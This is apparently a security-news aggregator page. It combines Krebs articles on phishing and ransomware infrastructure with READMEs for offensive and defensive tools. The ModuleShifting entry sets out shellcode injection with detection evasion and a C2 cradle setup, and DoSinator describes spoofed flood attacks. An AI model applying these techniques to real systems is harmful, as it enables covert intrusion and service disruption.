The traffic analysis just below the video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun’s other Telegram channels, it appears this account is being massively spammed at the moment — possibly thanks to public attention brought by this story.

Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.

Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.

With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.

If you’re unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark so as to avoid potential typosquatting sites.

Update: Added information about the Telegram bot and analysis.

☐ ☆ ✇ The Hacker News

Cybercriminals Using EvilProxy Phishing Kit to Target Senior Executives in U.S. Firms

By: Newsroom — October 9th 2023 at 12:36
Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks. Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and
☐ ☆ ✇ The Hacker News

Chinese Hackers Target Semiconductor Firms in East Asia with Cobalt Strike

By: Newsroom — October 6th 2023 at 11:49
Threat actors have been observed targeting semiconductor companies in East Asia with lures masquerading as Taiwan Semiconductor Manufacturing Company (TSMC) that are designed to deliver Cobalt Strike beacons. The intrusion set, per EclecticIQ, leverages a backdoor called HyperBro, which is then used as a conduit to deploy the commercial attack simulation software and post-exploitation toolkit.
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Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

By: Zion3R — October 5th 2023 at 11:30

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.

What is Dissect?

Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

Singular approach

And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

A modular setup

Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

Try it out now!

Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at to try Dissect in your browser.

Don’t know where to start? Check out the introduction page.

Want to get a detailed overview? Check out the overview page.

Want to read everything? Check out the documentation.


Dissect currently consists of the following projects.


These projects are closely related to Dissect, but not installed by this meta package.


This project is part of the Dissect framework and requires Python.

Information on the supported Python versions can be found in the Getting Started section of the documentation.


dissect is available on PyPI.

pip install dissect

Build and test instructions

This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

tox -e build

The build artifacts can be found in the dist/ directory.

tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:


For a more elaborate explanation on how to build and test the project, please see the documentation.

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ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R — October 4th 2023 at 11:30

ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.

ModuleShifting, when used with shellcode payload, is performing the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.

When using a PE payload, ModuleShifting will perform the following operation:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)

  1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
  2. Shellcode execution using function pointer. This helps in avoid a new thread creation or calling unusual function callbacks.
  3. restoring of original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.


All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.


This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.


ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone

  1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
  2. modify the parameters of script inside Pyramid Modules folder.
  3. Start the Pyramid server: python3 -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server -setcradle
  4. execute the generated cradle code on a python interpreter.


To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.

☐ ☆ ✇ Krebs on Security

‘Snatch’ Ransom Group Exposes Visitor IP Addresses

By: BrianKrebs — September 27th 2023 at 11:48

The victim shaming site operated by the Snatch ransomware group is leaking data about its true online location and internal operations, as well as the Internet addresses of its visitors, KrebsOnSecurity has found. The leaked data suggest that Snatch is one of several ransomware groups using paid ads on to trick people into installing malware disguised as popular free software, such as Microsoft Teams, Adobe Reader, Mozilla Thunderbird, and Discord.

First spotted in 2018, the Snatch ransomware group has published data stolen from hundreds of organizations that refused to pay a ransom demand. Snatch publishes its stolen data at a website on the open Internet, and that content is mirrored on the Snatch team’s darknet site, which is only reachable using the global anonymity network Tor.

The victim shaming website for the Snatch ransomware gang.

KrebsOnSecurity has learned that Snatch’s darknet site exposes its “server status” page, which includes information about the true Internet addresses of users accessing the website.

Refreshing this page every few seconds shows that the Snatch darknet site generates a decent amount of traffic, often attracting thousands of visitors each day. But by far the most frequent repeat visitors are coming from Internet addresses in Russia that either currently host Snatch’s clear web domain names or recently did.

The Snatch ransomware gang’s victim shaming site on the darknet is leaking data about its visitors. This “server status” page says that Snatch’s website is on Central European Summer Time (CEST) and is powered by OpenSSL/1.1.1f, which is no longer supported by security updates.

Probably the most active Internet address accessing Snatch’s darknet site is 193.108.114[.]41, which is a server in Yekaterinburg, Russia that hosts several Snatch domains, including snatchteam[.]top, sntech2ch[.]top, dwhyj2[.]top and sn76930193ch[.]top. It could well be that this Internet address is showing up frequently because Snatch’s clear-web site features a toggle button at the top that lets visitors switch over to accessing the site via Tor.

Another Internet address that showed up frequently in the Snatch server status page was 194.168.175[.]226, currently assigned to Matrix Telekom in Russia. According to, this address also hosts or else recently hosted the usual coterie of Snatch domains, as well as quite a few domains phishing known brands such as Amazon and Cashapp.

The Moscow Internet address 80.66.64[.]15 accessed the Snatch darknet site all day long, and that address also housed the appropriate Snatch clear-web domains. More interestingly, that address is home to multiple recent domains that appear confusingly similar to known software companies, including libreoff1ce[.]com and www-discord[.]com.

This is interesting because the phishing domains associated with the Snatch ransomware gang were all registered to the same Russian name — Mihail Kolesnikov, a name that is somewhat synonymous with recent phishing domains tied to malicious Google ads.

Kolesnikov could be a nod to a Russian general made famous during Boris Yeltsin’s reign. Either way, it’s clearly a pseudonym, but there are some other commonalities among these domains that may provide insight into how Snatch and other ransomware groups are sourcing their victims.

DomainTools says there are more than 1,300 current and former domain names registered to Mihail Kolesnikov between 2013 and July 2023. About half of the domains appear to be older websites advertising female escort services in major cities around the United States (e.g. the now-defunct pittsburghcitygirls[.]com).

The other half of the Kolesnikov websites are far more recent phishing domains mostly ending in “.top” and “.app” that appear designed to mimic the domains of major software companies, including www-citrix[.]top, www-microsofteams[.]top, www-fortinet[.]top, ibreoffice[.]top, www-docker[.]top, www-basecamp[.]top, ccleaner-cdn[.]top, adobeusa[.]top, and www.real-vnc[.]top.

In August 2023, researchers with Trustwave Spiderlabs said they encountered domains registered to Mihail Kolesnikov being used to disseminate the Rilide information stealer trojan.

But it appears multiple crime groups may be using these domains to phish people and disseminate all kinds of information-stealing malware. In February 2023, Spamhaus warned of a huge surge in malicious ads that were hijacking search results in, and being used to distribute at least five different families of information stealing trojans, including AuroraStealer, IcedID/Bokbot, Meta Stealer, RedLine Stealer and Vidar.

For example, Spamhaus said victims of these malicious ads would search for Microsoft Teams in, and the search engine would often return a paid ad spoofing Microsoft or Microsoft Teams as the first result — above all other results. The malicious ad would include a logo for Microsoft and at first glance appear to be a safe and trusted place to download the Microsoft Teams client.

However, anyone who clicked on the result was whisked away instead to mlcrosofteams-us[.]top — yet another malicious domain registered to Mr. Kolesnikov. And while visitors to this website may believe they are only downloading the Microsoft Teams client, the installer file includes a copy of the IcedID malware, which is really good at stealing passwords and authentication tokens from the victim’s web browser.

Image: Spamhaus

The founder of the Swiss anti-abuse website told Spamhaus it is likely that some cybercriminals have started to sell “malvertising as a service” on the dark web, and that there is a great deal of demand for this service.

In other words, someone appears to have built a very profitable business churning out and promoting new software-themed phishing domains and selling that as a service to other cybercriminals. Or perhaps they are simply selling any stolen data (and any corporate access) to active and hungry ransomware group affiliates.

The tip about the exposed “server status” page on the Snatch darkweb site came from @htmalgae, the same security researcher who alerted KrebsOnSecurity earlier this month that the darknet victim shaming site run by the 8Base ransomware gang was inadvertently left in development mode.

That oversight revealed not only the true Internet address of the hidden 8Base site (in Russia, naturally), but also the identity of a programmer in Moldova who apparently helped to develop the 8Base code.

@htmalgae said the idea of a ransomware group’s victim shaming site leaking data that they did not intend to expose is deliciously ironic.

“This is a criminal group that shames others for not protecting user data,” @htmalgae said. “And here they are leaking their user data.”

All of the malware mentioned in this story is designed to run on Microsoft Windows devices. But Malwarebytes recently covered the emergence of a Mac-based information stealer trojan called AtomicStealer that was being advertised through malicious Google ads and domains that were confusingly similar to software brands.

Please be extra careful when you are searching online for popular software titles. Cracked, pirated copies of major software titles are a frequent source of infostealer infections, as are these rogue ads masquerading as search results. Make sure to double-check you are actually at the domain you believe you’re visiting *before* you download and install anything.

Stay tuned for Part II of this post, which includes a closer look at the Snatch ransomware group and their founder.

Further reading:

@HTMalgae’s list of the top Internet addresses seen accessing Snatch’s darknet site

Ars Technica: Until Further Notice Think Twice Before Using Google to Download Software

Bleeping Computer: Hackers Abuse Google Ads to Spread Malware in Legit Software

☐ ☆ ✇ – The Hackers Arsenal Tools Portal

Unveiling the Awesome Lineup for Black Hat MEA Arsenal 2023 in Riyadh, KSA

By: NJ Ouchn — September 19th 2023 at 10:57
Are you ready for an exhilarating dive into the world of cybersecurity and cutting-edge technology?
☐ ☆ ✇ WeLiveSecurity

Deepfaking it: What to know about deepfake-driven sextortion schemes

— July 4th 2023 at 11:30
Criminals increasingly create deepfake nudes from people’s benign public photos in order to extort money from them, the FBI warns
☐ ☆ ✇ WeLiveSecurity

Is a RAT stealing your files? – Week in security with Tony Anscombe

— June 16th 2023 at 17:20
Could your Android phone be home to a remote access tool (RAT) that steals WhatsApp backups or performs other shenanigans?
☐ ☆ ✇ – The Hackers Arsenal Tools Portal

Announcing the First Black Hat / ToolsWatch SecTor Toronto 2023 Arsenal Tools and Their Impact on the Community

By: NJ Ouchn — September 12th 2023 at 09:20
In the world of cybersecurity, innovation is the name of the game. The constant evolution
☐ ☆ ✇ KitPloit - PenTest Tools!

KaliPackergeManager - Kali Packerge Manager

By: Zion3R — September 13th 2023 at 11:30 is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories. 


  • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
  • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
  • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
  • System Updates: Keep your system up to date with the integrated update functionality.


To install KaliPm, you can simply clone the repository from GitHub:

git clone


  1. Clone the repository or download the script.
  2. Navigate to the directory where the script is located.
  3. Make the script executable by running the following command:
    chmod +x
  4. Execute the script using the following command:
  5. Follow the on-screen instructions to select a category and choose the desired packages for installation.


  • System: Includes essential core items that are always included in the Kali Linux system.
  • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
  • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
  • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
  • Others: Contains additional packages and resources that don't fall into the above categories.

Update also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.


Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:

☐ ☆ ✇ KitPloit - PenTest Tools!

VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R — September 12th 2023 at 11:30

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.



Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone


To initiate VTScanner, follow these steps:

cd VTScanner


  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini


VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.


VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.

☐ ☆ ✇ KitPloit - PenTest Tools!

DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R — September 5th 2023 at 22:42

DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats. 


  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.


  • Python 3.x
  • scapy
  • argparse


  1. Clone the repository:

    git clone
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt


packets to send (default: 500). -ps PACKET_SIZE, --packet_size PACKET_SIZE Packet size in bytes (default: 64). -ar ATTACK_RATE, --attack_rate ATTACK_RATE Attack rate in packets per second (default: 10). -d DURATION, --duration DURATION Duration of the attack in seconds. -am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns} Attack mode (default: syn). -sp SPOOF_IP, --spoof-ip SPOOF_IP Spoof IP address. --data DATA Custom data string to send." dir="auto">
usage: [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.


The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.


Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.


If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

☐ ☆ ✇ KitPloit - PenTest Tools!

Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

By: Zion3R — September 3rd 2023 at 11:30

Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


From Git

git clone
cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 -d

From Dockerfile

You can run this application on a container after build a Dockerfile.

Warning : If you want to run a Docker container, associated threat analyzer recommends to use your malicious IPs and domains lists, because maintainer may not be update a default malicious IP and domain lists on docker image.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d

From DockerHub

docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d


-d DOMAIN , --domain DOMAIN Input Target. --domain
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json


  • First-level depth scan your domain address.

TODO list

  • Third-level or the more depth static files scanning for target web application.
Other linked github project. You can take a look.
Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence v1.1.1 collects static files

Default Malicious IPs and Domains Sources

Development and Contribution


☐ ☆ ✇ KitPloit - PenTest Tools!

Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

By: Zion3R — September 2nd 2023 at 12:30

A Pin Tool for tracing:

Bypasses the anti-tracing check based on RDTSC.

Generates a report in a .tag format (which can be loaded into other analysis tools):

RVA;traced event


345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress

How to build

On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer for more information. Detailed description available here.


 Details about the usage you will find on the project's Wiki.


  • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
  • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
  • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.

Questions? Ideas? Join Discussions!

☐ ☆ ✇ KitPloit - PenTest Tools!

Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

By: Zion3R — August 24th 2023 at 12:30

Holehe Online Version


Efficiently finding registered accounts from emails.

Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


With PyPI

pip3 install holehe

With Github

git clone
cd holehe/
python3 install

Quick Start

Holehe can be run from the CLI and rapidly embedded within existing python applications.

 CLI Example


 Python Example

import trio
import httpx

from holehe.modules.social_media.snapchat import snapchat

async def main():
email = ""
out = []
client = httpx.AsyncClient()

await snapchat(email, client, out)

await client.aclose()

Module Output

For each module, data is returned in a standard dictionary with the following json-equivalent format :

"name": "example",
"rateLimit": false,
"exists": true,
"emailrecovery": "ex****",
"phoneNumber": "0*******78",
"others": null
  • rateLitmit : Lets you know if you've been rate-limited.
  • exists : If an account exists for the email on that service.
  • emailrecovery : Sometimes partially obfuscated recovery emails are returned.
  • phoneNumber : Sometimes partially obfuscated recovery phone numbers are returned.
  • others : Any extra info.

Rate limit? Change your IP.

Maltego Transform : Holehe Maltego

Thank you to :


For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

 License

GNU General Public License v3.0

Built for educational purposes only.


Name Domain Method Frequent Rate Limit
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☐ ☆ ✇ Krebs on Security

Tourists Give Themselves Away by Looking Up. So Do Most Network Intruders.

By: BrianKrebs — August 22nd 2023 at 17:45

In large metropolitan areas, tourists are often easy to spot because they’re far more inclined than locals to gaze upward at the surrounding skyscrapers. Security experts say this same tourist dynamic is a dead giveaway in virtually all computer intrusions that lead to devastating attacks like data theft and ransomware, and that more organizations should set simple virtual tripwires that sound the alarm when authorized users and devices are spotted exhibiting this behavior.

In a blog post published last month, Cisco Talos said it was seeing a worrisome “increase in the rate of high-sophistication attacks on network infrastructure.” Cisco’s warning comes amid a flurry of successful data ransom and state-sponsored cyber espionage attacks targeting some of the most well-defended networks on the planet.

But despite their increasing complexity, a great many initial intrusions that lead to data theft could be nipped in the bud if more organizations started looking for the telltale signs of newly-arrived cybercriminals behaving like network tourists, Cisco says.

“One of the most important things to talk about here is that in each of the cases we’ve seen, the threat actors are taking the type of ‘first steps’ that someone who wants to understand (and control) your environment would take,” Cisco’s Hazel Burton wrote. “Examples we have observed include threat actors performing a ‘show config,’ ‘show interface,’ ‘show route,’ ‘show arp table’ and a ‘show CDP neighbor.’ All these actions give the attackers a picture of a router’s perspective of the network, and an understanding of what foothold they have.”

Cisco’s alert concerned espionage attacks from China and Russia that abused vulnerabilities in aging, end-of-life network routers. But at a very important level, it doesn’t matter how or why the attackers got that initial foothold on your network.

It might be zero-day vulnerabilities in your network firewall or file-transfer appliance. Your more immediate and primary concern has to be: How quickly can you detect and detach that initial foothold?

The same tourist behavior that Cisco described attackers exhibiting vis-a-vis older routers is also incredibly common early on in ransomware and data ransom attacks — which often unfurl in secret over days or weeks as attackers methodically identify and compromise a victim’s key network assets.

These virtual hostage situations usually begin with the intruders purchasing access to the target’s network from dark web brokers who resell access to stolen credentials and compromised computers. As a result, when those stolen resources first get used by would-be data thieves, almost invariably the attackers will run a series of basic commands asking the local system to confirm exactly who and where they are on the victim’s network.

This fundamental reality about modern cyberattacks — that cybercriminals almost always orient themselves by “looking up” who and where they are upon entering a foreign network for the first time — forms the business model of an innovative security company called Thinkst, which gives away easy-to-use tripwires or “canaries” that can fire off an alert whenever all sorts of suspicious activity is witnessed.

“Many people have pointed out that there are a handful of commands that are overwhelmingly run by attackers on compromised hosts (and seldom ever by regular users/usage),” the Thinkst website explains. “Reliably alerting when a user on your code-sign server runs whoami.exe can mean the difference between catching a compromise in week-1 (before the attackers dig in) and learning about the attack on CNN.”

These canaries — or “canary tokens” — are meant to be embedded inside regular files, acting much like a web beacon or web bug that tracks when someone opens an email.

The Canary Tokens website from Thinkst Canary lists nearly two-dozen free customizable canaries.

“Imagine doing that, but for file reads, database queries, process executions or patterns in log files,” the Canary Tokens documentation explains. “Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.”

Thinkst operates alongside a burgeoning industry offering so-called “deception” or “honeypot” services — those designed to confuse, disrupt and entangle network intruders. But in an interview with KrebsOnSecurity, Thinkst founder and CEO Haroon Meer said most deception techniques involve some degree of hubris.

“Meaning, you’ll have deception teams in your network playing spy versus spy with people trying to break in, and it becomes this whole counterintelligence thing,” Meer said. “Nobody really has time for that. Instead, we are saying literally the opposite: That you’ve probably got all these [security improvement] projects that are going to take forever. But while you’re doing all that, just drop these 10 canaries, because everything else is going to take a long time to do.”

The idea here is to lay traps in sensitive areas of your network or web applications where few authorized users should ever trod. Importantly, the canary tokens themselves are useless to an attacker. For example, that AWS canary token sure looks like the digital keys to your cloud, but the token itself offers no access. It’s just a lure for the bad guys, and you get an alert when and if it is ever touched.

One nice thing about canary tokens is that Thinkst gives them away for free. Head over to, and choose from a drop-down menu of available tokens, including:

-a web bug / URL token, designed to alert when a particular URL is visited;
-a DNS token, which alerts when a hostname is requested;
-an AWS token, which alerts when a specific Amazon Web Services key is used;
-a “custom exe” token, to alert when a specific Windows executable file or DLL is run;
